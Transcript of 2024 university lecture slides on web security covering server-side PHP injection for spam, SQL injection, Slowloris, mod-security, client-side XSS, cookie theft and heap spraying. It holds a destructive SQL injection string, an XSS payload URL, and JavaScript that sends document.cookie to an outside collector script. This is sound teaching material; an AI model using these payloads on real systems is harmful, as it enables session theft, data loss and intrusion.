Network Security Lecture 08: Web Security 2024 PDF

Summary

This document is a lecture on web security, covering prerequisites, languages, resources, common attacks like XSS, and security measures. It's presented by Sahar M. Ghanem at Alexandria University in 2024.

Full Transcript

Network Security

Lecture 08: Web Security
Prof. Dr. Sahar M. Ghanem
Associate Professor
Computer & Systems Engineering Dept.
Faculty of Engineering, Alexandria University
Prerequisites
URL & HTTP & HTML
Apache2 web server installed on an Ubuntu machine
Apache2 server is PHP7 enabled
MySQL database management system acting as the database
backend to the Apache2 server
A driver is installed that enables PHP to talk to MySQL
sendmail program running on the server

Network Security 2024, (c) Sahar M. Ghanem 2
Languages
PHP
Perl
MySQL
Python
JavaScript
CGI scripts

Network Security 2024, (c) Sahar M. Ghanem 3
Resources
PHP vs NodeJS: Comparison and benchmarks 2018
PHP: PHP Manual – Manual
PHP Tutorial
MySQL :: MySQL Documentation
(The only proper) PDO tutorial - Treating PHP Delusions
Modsecurity Project
JavaScript Tutorial
OWASP Foundation, the Open Source Foundation for Application
Security | OWASP Foundation

Network Security 2024, (c) Sahar M. Ghanem 4
Outline
XSS attack with server-side injection
SQL Injection Attack
The Slowloris Attack
mod-security
client-side XSS
Cookies & XSS for stealing cookies
The Heap Spray Exploit

Network Security 2024, (c) Sahar M. Ghanem 5
Web Security
Web security addresses the issues that are specific to
how web servers present their content to web browsers,
how web browsers interact with the servers, and
how people interact with the browsers.

Network Security 2024, (c) Sahar M. Ghanem 6
The World Wide Web
Until about a decade ago, the web servers offered only static content
but now web servers create content dynamically.
Dynamic content creation frequently requires that a web server be
connected to a database server for storing all the information that
needs to be dished out dynamically.
This requires some sort of middleware that can analyze the URL,
decide what to fetch, and then compose a web page to be sent back.
The “middleware” frequently consists of PHP scripts, especially if the
web server platform is the open-source Apache and MySQL as the
database.
Network Security 2024, (c) Sahar M. Ghanem 7
XSS attack with server-side injection

Network Security 2024, (c) Sahar M. Ghanem 8
XSS attack with server-side injection (1/5)
cross-site scripting (XSS) attack with server-side injection of malicious
code.
We have a supposedly unscrupulous provider of web hosting
services.
He wants to inject some PHP code into the web pages uploaded to his
server by unsuspecting clients.
By design, PHP is parsed out before it is sent to a browser (set of
directives in the apache2.conf config file).
The injected PHP code will NOT be visible to a client even when the
client views the page source in his/her browser.

Network Security 2024, (c) Sahar M. Ghanem 9
XSS attack with server-side injection (2/5)
The basic goal is to cause a spam file to be quietly downloaded from
a third-party spam mail provider whenever a client page is viewed.
The spam file consists of the email addresses and the content for
each email address in the form of print() commands to an output
stream that talks to the sendmail program running on the server.

Network Security 2024, (c) Sahar M. Ghanem 10
Network Security 2024, (c) Sahar M. Ghanem 11
XSS attack with server-side injection (3/5)
Web Hosting Service Provider:
IP address: 192.168.1.105
OS: Ubuntu 10.04
Web Server: Apache2 HTTPD server
MTA: Sendmail
Also available: Perl
Innocent Client:
IP address: 192.168.1.103
OS: Mac OS X
Web Browser: Safari 3.2.1
Email List Provider: https://engineering.purdue.edu/kak/emailer_pl
Network Security 2024, (c) Sahar M. Ghanem 12
XSS attack with server-side injection (4/5)
The web hosting service provider makes available an upload page, called
UploadYourWebPage.html, to his clients.
The HTML calls on uploadfile.php for the “Submit” action on the form.
It creates another file that is identical to what the client uploaded except
for the extra PHP code

Network Security 2024, (c) Sahar M. Ghanem 13
Network Security 2024, (c) Sahar M. Ghanem 14
emailer.pl

Network Security 2024, (c) Sahar M. Ghanem 15
Network Security 2024, (c) Sahar M. Ghanem 16
mail.log file

Network Security 2024, (c) Sahar M. Ghanem 17
XSS attack with server-side injection (5/5)
Note that even when an email is successfully placed on the wire, it
may NOT arrive at its destination for various reasons.
organizations block email coming from IP address blocks assigned to
residential units
the presence of localhost.localdomain string in the email header

Network Security 2024, (c) Sahar M. Ghanem 18
Kak’s code (Lecture 27)
engineering.purdue.edu/kak/emailer_pl
UploadYourWebPage.html
uploadfile.php

Network Security 2024, (c) Sahar M. Ghanem 19
SQL Injection Attack

Network Security 2024, (c) Sahar M. Ghanem 20
PHP + MySQL
PHP enabled web server works in conjunction with the MySQL
database management system.
For PHP and MySQL to work together on your Ubuntu machine, you
must also have installed the “php7.0-mysql” package.
This package allows a PHP script to make a direct connection with a
MySQL database through a PDO (PHP Data Objects) based driver.

Network Security 2024, (c) Sahar M. Ghanem 21
MySQL
Assume MySQL database with row-level security serving as a backend
to the Apache web server.
Create a MySQL database named Manager_db for the user Manager.
Create one table named Maintenance_Schedule.
Install in MySQL three accounts under the user names Operator1,
Operator2, and Operator3.
When any of these three individuals access the
Maintenance_Schedule table, he will be able to view only his/her
own row and no other rows.

Network Security 2024, (c) Sahar M. Ghanem 22
Network Security 2024, (c) Sahar M. Ghanem 23
Network Security 2024, (c) Sahar M. Ghanem 24
Network Security 2024, (c) Sahar M. Ghanem 25
SQL Injection Attack1 (1/2)
Create an HTML page RetrieveFromMySQL.html with a form element
that asks the visitor to enter his MySQL user name and password.
The file on the server side that will be executed when the visitor hits
the “Submit” button on the form is called RetrieveFromMySQL.php.
When this visitor clicked the “Submit” button of the form, that
caused his/her browser to send the following URL back to the server:
http://192.168.1.105/~kak/phpAndSqlExploits/RetrieveFromMySQL.php?user=
Operator1&password=operator1

Network Security 2024, (c) Sahar M. Ghanem 26
RetrieveFromMySQL.html

Network Security 2024, (c) Sahar M. Ghanem 27
SQL Injection Attack1 (2/2)
This URL is sent in clear text. So it would not be so difficult for an
adversary to mount an attack on the server for different possible
values for testing for certain kinds of vulnerabilities.
For this SQL injection, a major enabler of the exploit was the use of
the GET method for form submission. All of the form fields become a
part of the URL that is sent back to the web server.
The URL can so easily be manually altered.

Network Security 2024, (c) Sahar M. Ghanem 28
SQL Injection Attack2
Consider a user who has certain access privileges at a database and is
provided with a GUI for making the data entries.
insert into Maintenance_Schedule values ’Engine parts’, ’2009-06-30’;
when this user enters a string like
nothing; DROP TABLE *;
Such a user input could end up deleting all the tables in the database.
The main reason why an SQL Injection exploit works is the fact that,
the SQL syntax places the commands and the data on an equal
footing.

Network Security 2024, (c) Sahar M. Ghanem 29
Security against SQL Injection
Unless the user input is carefully filtered and the command access
privileges given to the user carefully controlled, a user input could
end up deleting all the tables in the database.
PDO (PHP Data Objects) based database driver provides a uniform API
for communicating with different database systems and considerable
security against SQL injection exploits.

Network Security 2024, (c) Sahar M. Ghanem 30
Kak’s code (Lecture 27)
RetrieveFromMySQL.html
RetrieveFromMySQL.php

Network Security 2024, (c) Sahar M. Ghanem 31
The Slowloris Attack

Network Security 2024, (c) Sahar M. Ghanem 32
The Slowloris Attack
By Robert Hansen in 2009
Consists of a client sending only partially completed queries to a web
server, the queries being long enough to create TCP circuits that the
server keeps open with the expectation that the partial requests
would be fulfilled soon.
If the server does not have sufficient concurrency available to it, a
Slowloris attack can potentially bring down a web server.

Network Security 2024, (c) Sahar M. Ghanem 33
The Slowloris Attack: Example1
HTTP requests emanating from a client could be a browser, download
script, or a system function like wget.
A ClientSocketFetchDocs.py is a Python client script that makes a
legitimate GET request a web server.
The web server continues to keep open the TCP connection until it
times out (using netstat it takes about 65 seconds ).
Running CheckNetstat.sh on the server side

Network Security 2024, (c) Sahar M. Ghanem 34
The Slowloris Attack: Example2
The TestHTTPServerWithNoCRLF.py script on the client side sends
the same server GET requests but without the final blank line.
If you run the script with run only once it will put the client to sleep
for 200 seconds in order to figure out how long the server would take
to shut the TCP circuit.
The server requires a longer timeout to close the TCP connection
with the client.

Network Security 2024, (c) Sahar M. Ghanem 35
The Slowloris Attack: Example3
Create a semblance of a Slowloris attack on the server by invoking the
previous script repeatedly as shown in RepeatedAttack.sh.
Starting up the script CheckNetstat.sh on the server side.
Even though the scripts shown have not completely jammed the
server, they do demonstrate how a client can silently bog it down and
reduce its performance to legitimate requests.
The script TerminateLoris.sh kills all the processes created by the
script RepeatedAttack.sh.

Network Security 2024, (c) Sahar M. Ghanem 36
SlowPost Attack
Another HTTP request method that can also be used for mounting
similar attacks on web servers is the POST request (SlowPOST attack).

Network Security 2024, (c) Sahar M. Ghanem 37
Kak’s code (Lecture 27)
Wayback Machine
ClientSocketFetchDocs.py
CheckNetstat.sh
TestHTTPServerWithNoCRLF.py
RepeatedAttack.sh
TerminateLoris.sh

Network Security 2024, (c) Sahar M. Ghanem 38
mod-security

Network Security 2024, (c) Sahar M. Ghanem 39
mod-security (1/2)
For Apache, the access log entries are in the file
/var/log/apache2/access.log
If you freshly installed web server on a machine, you would see a
scanning looking to see if port 80 is open with an HTTPD server
running and then going to try attacking that web server with all
known exploits.
HTTP requests coming to the web server do not mention the symbolic
hostname of the machine on which the web server is running, but
directly its IP address.

Network Security 2024, (c) Sahar M. Ghanem 40
mod-security (2/2)
To insulate a web server from port-scan driven attacks would be to
not honor requests that do not mention the symbolic hostname of
the machine.
For an Apache web server, the easiest way to make it secure is by
installing the mod-security module in the server.
The Core Rule Set should protect the web server against exploits
commonly attempted on web servers.

Network Security 2024, (c) Sahar M. Ghanem 41
client-side XSS

Network Security 2024, (c) Sahar M. Ghanem 42
client-side XSS (1/2)
The idea of a client-side XSS attack is to get a victim to click on a URL
that causes the browser’s JavaScript to execute malicious code.
An attacker knows that the victim is to click on the URL
http://10.0.0.13/~kak/xss_client_side_simple_demo.html
This HTML contains a call to PHP to echo back to the browser
whatever the web server receives as the value of the query field.

Network Security 2024, (c) Sahar M. Ghanem 43
xss_client_side_simple_demo.html

Client Side XSS Simple Demo

Client Side XSS -- Simple Demo
:

Network Security 2024, (c) Sahar M. Ghanem 44
client-side XSS (2/2)
The attacker may now get the victim to click on the following URL,
where there exists a query field that will be received by the web
server:
http://10.0.0.13/~kak/xss_client_side_simple_demo.html/?query=alert(’Do you agree?’);
The victim will see a JavaScript produced prompt window that waits
for a response with an “OK?” button (i.e. the browser executed a
fragment of JavaScript).

Network Security 2024, (c) Sahar M. Ghanem 45
Cookies

Network Security 2024, (c) Sahar M. Ghanem 46
Cookies (1/2)
It may be possible for third parties to steal cookies from an innocent
client’s browser by mounting XSS scripting attack.
JavaScript is meant specifically for browser-side computing and is an
object based language.
Cookies are generally used to retain some data from one session to
another between a client browser and a web server.

Network Security 2024, (c) Sahar M. Ghanem 47
Cookies (2/2)
You can see all the cookies in the browser
“Edit” --> “Preferences”
If you need to control who gets to place cookies in your browser and
to control which websites are allowed HTTP redirects.
the cookie controller that comes with the browser is a cookie blacklister
“Tools” --> “Add-ons” --> Cookie Whitelist with Buttons; and NoRedirect

Network Security 2024, (c) Sahar M. Ghanem 48
WealthTracker.html
If you run a web server and point the browser to
http://10.0.0.11/~kak/WealthTracker.html
You will see a form in your browser with two text-entry boxes, one for
your name and the other for your wealth, and with a “Submit”
button.
This page keeps track of how many times you have visited the page in
the past and how your wealth has changed from one visit to the next.
This form is not supposed to send anything back to the server.

Network Security 2024, (c) Sahar M. Ghanem 49
Network Security 2024, (c) Sahar M. Ghanem 50
Kak’s Code (Lecture 28)
WealthTracker.html

Network Security 2024, (c) Sahar M. Ghanem 51
XSS for stealing cookies

Network Security 2024, (c) Sahar M. Ghanem 52
XSS for stealing cookies (1/3)
The name of that earlier file was WealthTracker.html
It is converted into a CGI script named WealthTracker.cgi
STEP 1: Fire up the Apache web server in a laptop that has the CGI
script WealthTracker.cgi in its cgi-bin directory.
STEP 2: Point the browser to a URL:
http://10.0.0.11/cgi-bin/WealthTracker.cgi

Network Security 2024, (c) Sahar M. Ghanem 53
XSS for stealing cookies (2/3)
STEP 3: Bring up the JavaScript console in the browser, in the input
bar at the bottom of the console, enter the following two JavaScript
commands:
var cookie_info = document.cookie
window.open("https://engineering.purdue.edu/kak/cgi-bin/Collector.cgi?msg="
+ cookie_info)
The web server hosted by the engineering.purdue.edu domain is
hosting Collector.cgi that dumps whatever is supplied through the
parameter msg in a dump file collections.txt.

Network Security 2024, (c) Sahar M. Ghanem 54
XSS for stealing cookies (3/3)
STEP 4: display the contents of the file collections.txt that acquired
the cookie that was created by the browser.

Network Security 2024, (c) Sahar M. Ghanem 55
Kak’s Code (Lecture 28)
WealthTracker.cgi
Index of /kak/cgi-bin

Network Security 2024, (c) Sahar M. Ghanem 56
The Heap Spray Exploit

Network Security 2024, (c) Sahar M. Ghanem 57
Heap Spray Exploit
Used for the execution of arbitrary shell code through a client-side scripting
language like JavaScript.
1. Heap Spraying: fill up a significant chunk of memory available to the
script engine with no-op bytes (referred to as nop-sled)
2. Place malicious shell-executable code at the end of the long sequence of
no-op bytes.
3. Get the script engine to dereference any one of the memory locations
where the no-op bytes are stored.
4. The dereferencing operation cause the script engine to start executing
the code at that location and the subsequent locations that also contain
no-op bytes; and, finally, the execution would arrive at the malicious
code.

Network Security 2024, (c) Sahar M. Ghanem 58
Heap Spray References
Heap Feng Shui in JavaScript
darkc0dews - Pastebin.com
Blogs - Broadcom Community - VMTN - Discussion Forums, Technical
Docs, Ideas and Blogs

Network Security 2024, (c) Sahar M. Ghanem 59
Web Vulnerabilities

Network Security 2024, (c) Sahar M. Ghanem 60
Browser Vulnerabilities
Samy worm, in 2005 used browser-to-server communication to fetch
documents.
The JavaScript code is based on code by Alejandro Gervasio
JavaScript-Remote-Scripting-Fetching-Server-Data-with-the-DOM
Run Apache server, and point the browser to a URL that would look
like: http://10.185.42.199/~kak/js_getdata_from_server.html
Another mode of XSS attacks that involves the HTML tag
which allows a web page to incorporate the contents of another web
page. Code at http://www.bindshell.net/papers/xssv.html

Network Security 2024, (c) Sahar M. Ghanem 61
Web Application Security
The “Open Web Application Security Project” (OWASP) that is
focused on improving the security of web application software.
W3af is a tool for an exhaustive testing of a web application for all
kinds of vulnerabilities.
User guide file named w3af-users -guide.pdf.
Comes with 130 plugins meant for identifying SQL injection
vulnerabilities, cross-site scripting vulnerabilities, vulnerabilities
created by remote file inclusion, …

Network Security 2024, (c) Sahar M. Ghanem 62
Reference
https://fahrplan.events.ccc.de/congress/2006/Fahrplan/attachments/
1158-Subverting_Ajax.pdf

Network Security 2024, (c) Sahar M. Ghanem 63